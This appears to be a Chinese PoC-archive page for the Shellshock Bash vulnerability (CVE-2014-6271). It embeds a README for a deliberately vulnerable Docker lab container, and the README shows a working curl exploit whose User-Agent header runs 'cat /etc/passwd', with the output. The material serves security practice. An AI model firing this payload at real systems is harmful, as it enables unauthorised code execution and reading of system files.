关联漏洞
标题:
GNU Bash 远程代码执行漏洞
(CVE-2014-6271)
描述:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
描述
Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock
介绍
# Vulnerability as a Service - CVE 2014-6271
A Debian (Buster) Linux system with a vulnerable version of bash and a web application to showcase CVS-2014-6271, a.k.a. Shellshock.
# Overview
This docker container is based on Debian Buster and has been modified to use a vulernable version of Bash (bash_4.2:2b:dfsg-0.1).
A web application is available via Apache 2 and serves a CGI script which runs shell commands.
# Usage
Install the container with `docker pull hmlio/vaas-cve-2014-6271`
Run the container with a port mapping `docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271`
You should be able to access the web application at http://your-ip:8080/.
# Exploitation
The web application/vulnerable bash version can be exploited as shown below:
```sh
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
```
# Credits
The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse.
For further details please see <a href="https://www.vulnhub.com/entry/sokar-1,113/" target="_blank">https://www.vulnhub.com/entry/sokar-1,113/</a>.
文件快照
[4.0K] /data/pocs/9f4266ddbf647af4cea6bf20f1e156ba09cc9c33
├── [1.2K] Dockerfile
├── [ 692] index.html
├── [ 18K] LICENSE.md
├── [1.2K] README.md
└── [ 266] stats
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。